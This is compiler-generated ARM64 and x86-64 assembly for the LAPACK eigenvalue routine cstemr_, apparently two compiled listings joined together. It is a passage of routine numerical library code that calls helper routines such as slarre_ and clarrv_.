stur s0, [x29, #-228]
ldr s0, [sp, #220]
fmov s1, #4.00000000
fmul s0, s0, s1
stur s0, [x29, #-232]
ldur s0, [x29, #-228]
ldur s1, [x29, #-232]
fcmp s0, s1
cset w8, lt
tbnz w8, #0, LBB0_162
b LBB0_161
LBB0_161:
ldur s0, [x29, #-228]
str s0, [sp, #168] ; 4-byte Folded Spill
b LBB0_163
LBB0_162:
ldur s0, [x29, #-232]
str s0, [sp, #168] ; 4-byte Folded Spill
b LBB0_163
LBB0_163:
ldr s0, [sp, #168] ; 4-byte Folded Reload
str s0, [sp, #392]
b LBB0_164
LBB0_164:
ldur x0, [x29, #-56]
ldur x1, [x29, #-64]
ldur x8, [x29, #-72]
add x6, x8, #4
ldur x8, [x29, #-80]
add x7, x8, #4
ldur x8, [x29, #-176]
ldrsw x9, [sp, #404]
add x3, x8, x9, lsl #2
ldur x8, [x29, #-192]
ldrsw x9, [sp, #272]
add x2, x8, x9, lsl #2
ldur x17, [x29, #-120]
ldur x8, [x29, #-128]
add x16, x8, #4
ldur x8, [x29, #-176]
ldrsw x9, [sp, #288]
add x15, x8, x9, lsl #2
ldur x8, [x29, #-176]
ldrsw x9, [sp, #376]
add x14, x8, x9, lsl #2
ldur x8, [x29, #-192]
ldrsw x9, [sp, #320]
add x13, x8, x9, lsl #2
ldur x8, [x29, #-192]
ldrsw x9, [sp, #368]
add x12, x8, x9, lsl #2
ldur x8, [x29, #-176]
ldrsw x9, [sp, #280]
add x11, x8, x9, lsl #2
ldur x8, [x29, #-176]
ldrsw x9, [sp, #268]
add x10, x8, x9, lsl #2
ldur x8, [x29, #-192]
ldrsw x9, [sp, #284]
add x8, x8, x9, lsl #2
mov x9, sp
str x9, [sp, #160] ; 8-byte Folded Spill
str x3, [x9]
add x3, sp, #396
str x3, [x9, #8]
add x3, sp, #392
str x3, [x9, #16]
add x3, sp, #248
str x3, [x9, #24]
add x3, sp, #244
str x3, [x9, #32]
str x2, [x9, #40]
str x17, [x9, #48]
str x16, [x9, #56]
str x15, [x9, #64]
str x14, [x9, #72]
str x13, [x9, #80]
str x12, [x9, #88]
str x11, [x9, #96]
add x11, sp, #252
str x11, [x9, #104]
str x10, [x9, #112]
str x8, [x9, #120]
add x8, sp, #372
str x8, [x9, #128]
add x2, sp, #312
add x3, sp, #296
add x4, sp, #228
add x5, sp, #224
bl _slarre_
ldr w8, [sp, #372]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_169
b LBB0_165
LBB0_165:
ldr w8, [sp, #372]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB0_167
b LBB0_166
LBB0_166:
ldr w8, [sp, #372]
str w8, [sp, #156] ; 4-byte Folded Spill
b LBB0_168
LBB0_167:
ldr w9, [sp, #372]
mov w8, #0
subs w8, w8, w9
str w8, [sp, #156] ; 4-byte Folded Spill
b LBB0_168
LBB0_168:
ldr w8, [sp, #156] ; 4-byte Folded Reload
add w8, w8, #10
ldur x9, [x29, #-208]
str w8, [x9]
stur wzr, [x29, #-36]
b LBB0_221
LBB0_169:
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_176
b LBB0_170
LBB0_170:
ldur x0, [x29, #-64]
ldur x8, [x29, #-72]
add x3, x8, #4
ldur x8, [x29, #-80]
add x4, x8, #4
ldur x8, [x29, #-192]
ldrsw x9, [sp, #272]
add x6, x8, x9, lsl #2
ldur x7, [x29, #-120]
ldur x5, [x29, #-120]
ldur x8, [x29, #-128]
add x2, x8, #4
ldur x8, [x29, #-176]
ldrsw x9, [sp, #288]
add x1, x8, x9, lsl #2
ldur x8, [x29, #-176]
ldrsw x9, [sp, #376]
add x17, x8, x9, lsl #2
ldur x8, [x29, #-192]
ldrsw x9, [sp, #320]
add x16, x8, x9, lsl #2
ldur x8, [x29, #-192]
ldrsw x9, [sp, #368]
add x15, x8, x9, lsl #2
ldur x8, [x29, #-176]
ldrsw x9, [sp, #280]
add x14, x8, x9, lsl #2
ldur x8, [x29, #-136]
ldursw x9, [x29, #-216]
add x13, x8, x9, lsl #3
ldur x12, [x29, #-144]
ldur x8, [x29, #-160]
add x11, x8, #4
ldur x8, [x29, #-176]
ldrsw x9, [sp, #268]
add x10, x8, x9, lsl #2
ldur x8, [x29, #-192]
ldrsw x9, [sp, #284]
add x8, x8, x9, lsl #2
mov x9, sp
str x9, [sp, #144] ; 8-byte Folded Spill
adrp x19, _c__1@PAGE
add x19, x19, _c__1@PAGEOFF
str x19, [x9]
str x5, [x9, #8]
adrp x5, _c_b18@PAGE
add x5, x5, _c_b18@PAGEOFF
str x5, [x9, #16]
add x5, sp, #396
str x5, [x9, #24]
add x5, sp, #392
str x5, [x9, #32]
str x2, [x9, #40]
str x1, [x9, #48]
str x17, [x9, #56]
str x16, [x9, #64]
str x15, [x9, #72]
str x14, [x9, #80]
str x13, [x9, #88]
str x12, [x9, #96]
str x11, [x9, #104]
str x10, [x9, #112]
str x8, [x9, #120]
add x8, sp, #372
str x8, [x9, #128]
add x1, sp, #312
add x2, sp, #296
add x5, sp, #252
bl _clarrv_
ldr w8, [sp, #372]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_175
b LBB0_171
LBB0_171:
ldr w8, [sp, #372]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB0_173
b LBB0_172
LBB0_172:
ldr w8, [sp, #372]
str w8, [sp, #140] ; 4-byte Folded Spill
b LBB0_174
LBB0_173:
ldr w9, [sp, #372]
mov w8, #0
subs w8, w8, w9
str w8, [sp, #140] ; 4-byte Folded Spill
b LBB0_174
LBB0_174:
ldr w8, [sp, #140] ; 4-byte Folded Reload
add w8, w8, #20
ldur x9, [x29, #-208]
str w8, [x9]
stur wzr, [x29, #-36]
b LBB0_221
LBB0_175:
b LBB0_181
LBB0_176:
ldur x8, [x29, #-120]
ldr w8, [x8]
stur w8, [x29, #-220]
mov w8, #1
str w8, [sp, #384]
b LBB0_177
LBB0_177: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #384]
ldur w9, [x29, #-220]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_180
b LBB0_178
LBB0_178: ; in Loop: Header=BB0_177 Depth=1
ldur x8, [x29, #-192]
ldr w9, [sp, #320]
ldr w10, [sp, #384]
add w9, w9, w10
subs w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
str w8, [sp, #412]
ldur x8, [x29, #-80]
ldur x9, [x29, #-192]
ldr w10, [sp, #272]
ldr w11, [sp, #412]
add w10, w10, w11
subs w10, w10, #1
ldrsw x9, [x9, w10, sxtw #2]
ldr s1, [x8, x9, lsl #2]
ldur x8, [x29, #-128]
ldrsw x9, [sp, #384]
add x8, x8, x9, lsl #2
ldr s0, [x8]
fadd s0, s0, s1
str s0, [x8]
b LBB0_179
LBB0_179: ; in Loop: Header=BB0_177 Depth=1
ldr w8, [sp, #384]
add w8, w8, #1
str w8, [sp, #384]
b LBB0_177
LBB0_180:
b LBB0_181
LBB0_181:
ldur x8, [x29, #-168]
ldr w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_195
b LBB0_182
LBB0_182:
mov w8, #1
str w8, [sp, #324]
str w8, [sp, #304]
ldur x9, [x29, #-192]
ldr w10, [sp, #320]
ldur x11, [x29, #-120]
ldr w11, [x11]
add w10, w10, w11
subs w10, w10, #1
ldr w9, [x9, w10, sxtw #2]
stur w9, [x29, #-220]
stur w8, [x29, #-244]
b LBB0_183
LBB0_183: ; =>This Loop Header: Depth=1
; Child Loop BB0_185 Depth 2
ldur w8, [x29, #-244]
ldur w9, [x29, #-220]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_194
b LBB0_184
LBB0_184: ; in Loop: Header=BB0_183 Depth=1
ldur x8, [x29, #-192]
ldr w9, [sp, #272]
ldur w10, [x29, #-244]
add w9, w9, w10
subs w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
stur w8, [x29, #-240]
ldur w8, [x29, #-240]
ldr w9, [sp, #324]
subs w8, w8, w9
add w8, w8, #1
str w8, [sp, #336]
ldr w8, [sp, #304]
subs w8, w8, #1
stur w8, [x29, #-248]
b LBB0_185
LBB0_185: ; Parent Loop BB0_183 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-248]
ldur x9, [x29, #-120]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_189
b LBB0_186
LBB0_186: ; in Loop: Header=BB0_185 Depth=2
ldur x8, [x29, #-192]
ldr w9, [sp, #320]
ldur w10, [x29, #-248]
add w9, w9, w10
ldr w8, [x8, w9, sxtw #2]
ldur w9, [x29, #-244]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_188
b LBB0_187
LBB0_187: ; in Loop: Header=BB0_185 Depth=2
ldur w8, [x29, #-248]
add w8, w8, #1
stur w8, [x29, #-248]
b LBB0_185
LBB0_188: ; in Loop: Header=BB0_183 Depth=1
b LBB0_189
LBB0_189: ; in Loop: Header=BB0_183 Depth=1
ldur w8, [x29, #-248]
ldr w9, [sp, #304]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_191
b LBB0_190
LBB0_190: ; in Loop: Header=BB0_183 Depth=1
ldur w8, [x29, #-240]
add w8, w8, #1
str w8, [sp, #324]
b LBB0_192
LBB0_191: ; in Loop: Header=BB0_183 Depth=1
ldur x8, [x29, #-192]
ldr w9, [sp, #368]
ldr w10, [sp, #304]
add w9, w9, w10
subs w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
subs w8, w8, #1
add x6, sp, #276
str w8, [sp, #276]
ldur x8, [x29, #-192]
ldr w9, [sp, #368]
ldr w10, [sp, #304]
add w9, w9, w10
subs w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
add x3, sp, #264
str w8, [sp, #264]
ldur x8, [x29, #-192]
ldr w9, [sp, #368]
ldur w10, [x29, #-248]
add w9, w9, w10
subs w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
add x4, sp, #364
str w8, [sp, #364]
ldr s0, [sp, #220]
fmov s1, #4.00000000
fmul s0, s0, s1
add x5, sp, #392
str s0, [sp, #392]
ldur x8, [x29, #-176]
ldur w9, [x29, #-236]
ldr w10, [sp, #324]
add w9, w9, w10
subs w9, w9, #1
add x1, x8, w9, sxtw #2
ldur x8, [x29, #-176]
ldr w9, [sp, #404]
ldr w10, [sp, #324]
add w9, w9, w10
subs w9, w9, #1
add x2, x8, w9, sxtw #2
ldur x8, [x29, #-128]
ldrsw x9, [sp, #304]
add x7, x8, x9, lsl #2
ldur x8, [x29, #-176]
ldr w9, [sp, #288]
ldr w10, [sp, #304]
add w9, w9, w10
subs w9, w9, #1
add x11, x8, w9, sxtw #2
ldur x8, [x29, #-176]
ldrsw x9, [sp, #268]
add x10, x8, x9, lsl #2
ldur x8, [x29, #-192]
ldrsw x9, [sp, #284]
add x8, x8, x9, lsl #2
mov x9, sp
str x11, [x9]
str x10, [x9, #8]
str x8, [x9, #16]
add x8, sp, #252
str x8, [x9, #24]
add x8, sp, #408
str x8, [x9, #32]
add x8, sp, #372
str x8, [x9, #40]
add x0, sp, #336
bl _slarrj_
ldur w8, [x29, #-240]
add w8, w8, #1
str w8, [sp, #324]
ldur w8, [x29, #-248]
add w8, w8, #1
str w8, [sp, #304]
b LBB0_192
LBB0_192: ; in Loop: Header=BB0_183 Depth=1
b LBB0_193
LBB0_193: ; in Loop: Header=BB0_183 Depth=1
ldur w8, [x29, #-244]
add w8, w8, #1
stur w8, [x29, #-244]
b LBB0_183
LBB0_194:
b LBB0_195
LBB0_195:
ldr s0, [sp, #380]
fmov s1, #1.00000000
fcmp s0, s1
cset w8, eq
tbnz w8, #0, LBB0_197
b LBB0_196
LBB0_196:
ldr s1, [sp, #380]
fmov s0, #1.00000000
fdiv s0, s0, s1
sub x1, x29, #228
stur s0, [x29, #-228]
ldur x0, [x29, #-120]
ldur x8, [x29, #-128]
add x2, x8, #4
adrp x3, _c__1@PAGE
add x3, x3, _c__1@PAGEOFF
bl _sscal_
b LBB0_197
LBB0_197:
b LBB0_198
LBB0_198:
ldr w8, [sp, #244]
subs w8, w8, #1
cset w8, gt
tbnz w8, #0, LBB0_200
b LBB0_199
LBB0_199:
ldur x8, [x29, #-64]
ldr w8, [x8]
subs w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB0_220
b LBB0_200
LBB0_200:
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_204
b LBB0_201
LBB0_201:
ldur x1, [x29, #-120]
ldur x8, [x29, #-128]
add x2, x8, #4
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
add x3, sp, #372
bl _slasrt_
ldr w8, [sp, #372]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_203
b LBB0_202
LBB0_202:
ldur x9, [x29, #-208]
mov w8, #3
str w8, [x9]
stur wzr, [x29, #-36]
b LBB0_221
LBB0_203:
b LBB0_219
LBB0_204:
ldur x8, [x29, #-120]
ldr w9, [x8]
mov w8, #1
subs w9, w9, #1
stur w9, [x29, #-220]
str w8, [sp, #384]
b LBB0_205
LBB0_205: ; =>This Loop Header: Depth=1
; Child Loop BB0_207 Depth 2
ldr w8, [sp, #384]
ldur w9, [x29, #-220]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_218
b LBB0_206
LBB0_206: ; in Loop: Header=BB0_205 Depth=1
str wzr, [sp, #388]
ldur x8, [x29, #-128]
ldrsw x9, [sp, #384]
ldr s0, [x8, x9, lsl #2]
str s0, [sp, #216]
ldur x8, [x29, #-120]
ldr w8, [x8]
stur w8, [x29, #-224]
ldr w8, [sp, #384]
add w8, w8, #1
str w8, [sp, #344]
b LBB0_207
LBB0_207: ; Parent Loop BB0_205 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #344]
ldur w9, [x29, #-224]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_212
b LBB0_208
LBB0_208: ; in Loop: Header=BB0_207 Depth=2
ldur x8, [x29, #-128]
ldrsw x9, [sp, #344]
ldr s0, [x8, x9, lsl #2]
ldr s1, [sp, #216]
fcmp s0, s1
cset w8, pl
tbnz w8, #0, LBB0_210
b LBB0_209
LBB0_209: ; in Loop: Header=BB0_207 Depth=2
ldr w8, [sp, #344]
str w8, [sp, #388]
ldur x8, [x29, #-128]
ldrsw x9, [sp, #344]
ldr s0, [x8, x9, lsl #2]
str s0, [sp, #216]
b LBB0_210
LBB0_210: ; in Loop: Header=BB0_207 Depth=2
b LBB0_211
LBB0_211: ; in Loop: Header=BB0_207 Depth=2
ldr w8, [sp, #344]
add w8, w8, #1
str w8, [sp, #344]
b LBB0_207
LBB0_212: ; in Loop: Header=BB0_205 Depth=1
ldr w8, [sp, #388]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_216
b LBB0_213
LBB0_213: ; in Loop: Header=BB0_205 Depth=1
ldur x8, [x29, #-128]
ldrsw x9, [sp, #384]
ldr s0, [x8, x9, lsl #2]
ldur x8, [x29, #-128]
ldrsw x9, [sp, #388]
str s0, [x8, x9, lsl #2]
ldr s0, [sp, #216]
ldur x8, [x29, #-128]
ldrsw x9, [sp, #384]
str s0, [x8, x9, lsl #2]
ldr w8, [sp, #356]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_215
b LBB0_214
LBB0_214: ; in Loop: Header=BB0_205 Depth=1
ldur x0, [x29, #-64]
ldur x8, [x29, #-136]
ldr w9, [sp, #388]
ldur w10, [x29, #-212]
mul w9, w9, w10
add w9, w9, #1
add x1, x8, w9, sxtw #3
ldur x8, [x29, #-136]
ldr w9, [sp, #384]
ldur w10, [x29, #-212]
mul w9, w9, w10
add w9, w9, #1
add x3, x8, w9, sxtw #3
adrp x4, _c__1@PAGE
add x4, x4, _c__1@PAGEOFF
mov x2, x4
bl _cswap_
ldur x8, [x29, #-160]
ldr w9, [sp, #388]
lsl w9, w9, #1
subs w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
str w8, [sp, #412]
ldur x8, [x29, #-160]
ldr w9, [sp, #384]
lsl w9, w9, #1
subs w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
ldur x9, [x29, #-160]
ldr w10, [sp, #388]
lsl w10, w10, #1
subs w10, w10, #1
str w8, [x9, w10, sxtw #2]
ldr w8, [sp, #412]
ldur x9, [x29, #-160]
ldr w10, [sp, #384]
lsl w10, w10, #1
subs w10, w10, #1
str w8, [x9, w10, sxtw #2]
ldur x8, [x29, #-160]
ldr w9, [sp, #388]
lsl w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
str w8, [sp, #412]
ldur x8, [x29, #-160]
ldr w9, [sp, #384]
lsl w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
ldur x9, [x29, #-160]
ldr w10, [sp, #388]
lsl w10, w10, #1
str w8, [x9, w10, sxtw #2]
ldr w8, [sp, #412]
ldur x9, [x29, #-160]
ldr w10, [sp, #384]
lsl w10, w10, #1
str w8, [x9, w10, sxtw #2]
b LBB0_215
LBB0_215: ; in Loop: Header=BB0_205 Depth=1
b LBB0_216
LBB0_216: ; in Loop: Header=BB0_205 Depth=1
b LBB0_217
LBB0_217: ; in Loop: Header=BB0_205 Depth=1
ldr w8, [sp, #384]
add w8, w8, #1
str w8, [sp, #384]
b LBB0_205
LBB0_218:
b LBB0_219
LBB0_219:
b LBB0_220
LBB0_220:
ldr s0, [sp, #360]
scvtf s0, s0
ldur x8, [x29, #-176]
str s0, [x8, #4]
ldr w8, [sp, #260]
ldur x9, [x29, #-192]
str w8, [x9, #4]
stur wzr, [x29, #-36]
b LBB0_221
LBB0_221:
ldur w0, [x29, #-36]
add sp, sp, #640
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
ldp x20, x19, [sp, #16] ; 16-byte Folded Reload
ldp x22, x21, [sp], #48 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "V"
l_.str.1: ; @.str.1
.asciz "A"
l_.str.2: ; @.str.2
.asciz "I"
l_.str.3: ; @.str.3
.asciz "N"
l_.str.4: ; @.str.4
.asciz "Safe minimum"
l_.str.5: ; @.str.5
.asciz "Precision"
l_.str.6: ; @.str.6
.asciz "T"
l_.str.7: ; @.str.7
.asciz "CSTEMR"
l_.str.8: ; @.str.8
.asciz "M"
.section __DATA,__data
.p2align 2 ; @c__1
_c__1:
.long 1 ; 0x1
.p2align 2 ; @c_b18
_c_b18:
.long 0x3b449ba6 ; float 0.00300000003
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function cstemr_
LCPI0_0:
.quad 0x3ff0000000000000 ## double 1
LCPI0_3:
.quad 0x3fa99999a0000000 ## double 0.05000000074505806
LCPI0_4:
.quad 0x3f747ae140000000 ## double 0.004999999888241291
.section __TEXT,__literal4,4byte_literals
.p2align 2
LCPI0_1:
.long 0x3f800000 ## float 1
LCPI0_2:
.long 0x40800000 ## float 4
.section __TEXT,__text,regular,pure_instructions
.globl _cstemr_
.p2align 4, 0x90
_cstemr_: ## @cstemr_
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
pushq %r15
pushq %r14
pushq %r13
pushq %r12
pushq %rbx
subq $680, %rsp ## imm = 0x2A8
.cfi_offset %rbx, -56
.cfi_offset %r12, -48
.cfi_offset %r13, -40
.cfi_offset %r14, -32
.cfi_offset %r15, -24
movq 128(%rbp), %rax
movq 120(%rbp), %rax
movq 112(%rbp), %rax
movq 104(%rbp), %rax
movq 96(%rbp), %rax
movq 88(%rbp), %rax
movq 80(%rbp), %rax
movq 72(%rbp), %rax
movq 64(%rbp), %rax
movq 56(%rbp), %rax
movq 48(%rbp), %rax
movq 40(%rbp), %rax
movq 32(%rbp), %rax
movq 24(%rbp), %rax
movq 16(%rbp), %rax
movq %rdi, -56(%rbp)
movq %rsi, -64(%rbp)
movq %rdx, -72(%rbp)
movq %rcx, -80(%rbp)
movq %r8, -88(%rbp)
movq %r9, -96(%rbp)
movq -80(%rbp), %rax
addq $-4, %rax
movq %rax, -80(%rbp)
movq -88(%rbp), %rax
addq $-4, %rax
movq %rax, -88(%rbp)
movq 48(%rbp), %rax
addq $-4, %rax
movq %rax, 48(%rbp)
movq 64(%rbp), %rax
movl (%rax), %eax
movl %eax, -100(%rbp)
movl -100(%rbp), %eax
shll $0, %eax
addl $1, %eax
movl %eax, -104(%rbp)
movl -104(%rbp), %ecx
movq 56(%rbp), %rax
movslq %ecx, %rdx
xorl %ecx, %ecx
## kill: def $rcx killed $ecx
subq %rdx, %rcx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, 56(%rbp)
movq 80(%rbp), %rax
addq $-4, %rax
movq %rax, 80(%rbp)
movq 96(%rbp), %rax
addq $-4, %rax
movq %rax, 96(%rbp)
movq 112(%rbp), %rax
addq $-4, %rax
movq %rax, 112(%rbp)
movq -56(%rbp), %rdi
leaq L_.str(%rip), %rsi
callq _lsame_
movl %eax, -204(%rbp)
movq -64(%rbp), %rdi
leaq L_.str.1(%rip), %rsi
callq _lsame_
movl %eax, -228(%rbp)
movq -64(%rbp), %rdi
leaq L_.str(%rip), %rsi
callq _lsame_
movl %eax, -252(%rbp)
movq -64(%rbp), %rdi
leaq L_.str.2(%rip), %rsi
callq _lsame_
movl %eax, -232(%rbp)
movq 104(%rbp), %rcx
movb $1, %al
cmpl $-1, (%rcx)
movb %al, -345(%rbp) ## 1-byte Spill
je LBB0_2
## %bb.1:
movq 120(%rbp), %rax
cmpl $-1, (%rax)
sete %al
movb %al, -345(%rbp) ## 1-byte Spill
LBB0_2:
movb -345(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
movl %eax, -324(%rbp)
movq 72(%rbp), %rax
cmpl $-1, (%rax)
sete %al
andb $1, %al
movzbl %al, %eax
movl %eax, -328(%rbp)
cmpl $0, -204(%rbp)
je LBB0_4
## %bb.3:
movq -72(%rbp), %rax
imull $18, (%rax), %eax
movl %eax, -200(%rbp)
movq -72(%rbp), %rax
imull $10, (%rax), %eax
movl %eax, -300(%rbp)
jmp LBB0_5
LBB0_4:
movq -72(%rbp), %rax
imull $12, (%rax), %eax
movl %eax, -200(%rbp)
movq -72(%rbp), %rax
movl (%rax), %eax
shll $3, %eax
movl %eax, -300(%rbp)
LBB0_5:
xorps %xmm0, %xmm0
movss %xmm0, -248(%rbp)
xorps %xmm0, %xmm0
movss %xmm0, -264(%rbp)
movl $0, -332(%rbp)
movl $0, -336(%rbp)
movl $0, -316(%rbp)
cmpl $0, -252(%rbp)
je LBB0_7
## %bb.6:
movq -96(%rbp), %rax
movss (%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -248(%rbp)
movq 16(%rbp), %rax
movss (%rax), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -264(%rbp)
jmp LBB0_10
LBB0_7:
cmpl $0, -232(%rbp)
je LBB0_9
## %bb.8:
movq 24(%rbp), %rax
movl (%rax), %eax
movl %eax, -332(%rbp)
movq 32(%rbp), %rax
movl (%rax), %eax
movl %eax, -336(%rbp)
LBB0_9:
jmp LBB0_10
LBB0_10:
movq 128(%rbp), %rax
movl $0, (%rax)
cmpl $0, -204(%rbp)
jne LBB0_13
## %bb.11:
movq -56(%rbp), %rdi
leaq L_.str.3(%rip), %rsi
callq _lsame_
cmpl $0, %eax
jne LBB0_13
## %bb.12:
movq 128(%rbp), %rax
movl $-1, (%rax)
jmp LBB0_49
LBB0_13:
cmpl $0, -228(%rbp)
jne LBB0_17
## %bb.14:
cmpl $0, -252(%rbp)
jne LBB0_17
## %bb.15:
cmpl $0, -232(%rbp)
jne LBB0_17
## %bb.16:
movq 128(%rbp), %rax
movl $-2, (%rax)
jmp LBB0_48
LBB0_17:
movq -72(%rbp), %rax
cmpl $0, (%rax)
jge LBB0_19
## %bb.18:
movq 128(%rbp), %rax
movl $-3, (%rax)
jmp LBB0_47
LBB0_19:
cmpl $0, -252(%rbp)
je LBB0_23
## %bb.20:
movq -72(%rbp), %rax
cmpl $0, (%rax)
jle LBB0_23
## %bb.21:
movss -264(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
movss -248(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss %xmm1, %xmm0
jb LBB0_23
## %bb.22:
movq 128(%rbp), %rax
movl $-7, (%rax)
jmp LBB0_46
LBB0_23:
cmpl $0, -232(%rbp)
je LBB0_27
## %bb.24:
cmpl $1, -332(%rbp)
jl LBB0_26
## %bb.25:
movl -332(%rbp), %eax
movq -72(%rbp), %rcx
cmpl (%rcx), %eax
jle LBB0_27
LBB0_26:
movq 128(%rbp), %rax
movl $-8, (%rax)
jmp LBB0_45
LBB0_27:
cmpl $0, -232(%rbp)
je LBB0_31
## %bb.28:
movl -336(%rbp), %eax
cmpl -332(%rbp), %eax
jl LBB0_30
## %bb.29:
movl -336(%rbp), %eax
movq -72(%rbp), %rcx
cmpl (%rcx), %eax
jle LBB0_31
LBB0_30:
movq 128(%rbp), %rax
movl $-9, (%rax)
jmp LBB0_44
LBB0_31:
movq 64(%rbp), %rax
cmpl $1, (%rax)
jl LBB0_34
## %bb.32:
cmpl $0, -204(%rbp)
je LBB0_35
## %bb.33:
movq 64(%rbp), %rax
movl (%rax), %eax
movq -72(%rbp), %rcx
cmpl (%rcx), %eax
jge LBB0_35
LBB0_34:
movq 128(%rbp), %rax
movl $-13, (%rax)
jmp LBB0_43
LBB0_35:
movq 104(%rbp), %rax
movl (%rax), %eax
cmpl -200(%rbp), %eax
jge LBB0_38
## %bb.36:
cmpl $0, -324(%rbp)
jne LBB0_38
## %bb.37:
movq 128(%rbp), %rax
movl $-17, (%rax)
jmp LBB0_42
LBB0_38:
movq 120(%rbp), %rax
movl (%rax), %eax
cmpl -300(%rbp), %eax
jge LBB0_41
## %bb.39:
cmpl $0, -324(%rbp)
jne LBB0_41
## %bb.40:
movq 128(%rbp), %rax
movl $-19, (%rax)
LBB0_41:
jmp LBB0_42
LBB0_42:
jmp LBB0_43
LBB0_43:
jmp LBB0_44
LBB0_44:
jmp LBB0_45
LBB0_45:
jmp LBB0_46
LBB0_46:
jmp LBB0_47
LBB0_47:
jmp LBB0_48
LBB0_48:
jmp LBB0_49
LBB0_49:
leaq L_.str.4(%rip), %rdi
callq _slamch_
movss %xmm0, -260(%rbp)
leaq L_.str.5(%rip), %rdi
callq _slamch_
movss %xmm0, -340(%rbp)
movss -260(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
divss -340(%rbp), %xmm0
movss %xmm0, -320(%rbp)
movss LCPI0_1(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero
divss -320(%rbp), %xmm0
movss %xmm0, -268(%rbp)
movss -320(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
sqrtsd %xmm0, %xmm0
cvtsd2ss %xmm0, %xmm0
movss %xmm0, -140(%rbp)
movss -268(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
sqrtsd %xmm0, %xmm0
cvtsd2ss %xmm0, %xmm0
movss %xmm0, -116(%rbp)
movss -260(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
sqrtsd %xmm0, %xmm0
sqrtsd %xmm0, %xmm1
movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero
divsd %xmm1, %xmm0
cvtsd2ss %xmm0, %xmm0
movss %xmm0, -120(%rbp)
movss -116(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss %xmm1, %xmm0
jb LBB0_51
## %bb.50:
movss -116(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -352(%rbp) ## 4-byte Spill
jmp LBB0_52
LBB0_51:
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -352(%rbp) ## 4-byte Spill
LBB0_52:
movss -352(%rbp), %xmm0 ## 4-byte Reload
## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -144(%rbp)
movq 128(%rbp), %rax
cmpl $0, (%rax)
jne LBB0_73
## %bb.53:
cvtsi2ssl -200(%rbp), %xmm0
movq 96(%rbp), %rax
movss %xmm0, 4(%rax)
movl -300(%rbp), %ecx
movq 112(%rbp), %rax
movl %ecx, 4(%rax)
cmpl $0, -204(%rbp)
je LBB0_56
## %bb.54:
cmpl $0, -228(%rbp)
je LBB0_56
## %bb.55:
movq -72(%rbp), %rax
movl (%rax), %eax
movl %eax, -304(%rbp)
jmp LBB0_65
LBB0_56:
cmpl $0, -204(%rbp)
je LBB0_59
## %bb.57:
cmpl $0, -252(%rbp)
je LBB0_59
## %bb.58:
movq -72(%rbp), %rsi
movq -96(%rbp), %rdx
movq 16(%rbp), %rcx
movq -80(%rbp), %r8
addq $4, %r8
movq -88(%rbp), %r9
addq $4, %r9
movq 128(%rbp), %rax
leaq L_.str.6(%rip), %rdi
leaq -260(%rbp), %r14
leaq -304(%rbp), %rbx
leaq -148(%rbp), %r11
leaq -160(%rbp), %r10
movq %r14, (%rsp)
movq %rbx, 8(%rsp)
movq %r11, 16(%rsp)
movq %r10, 24(%rsp)
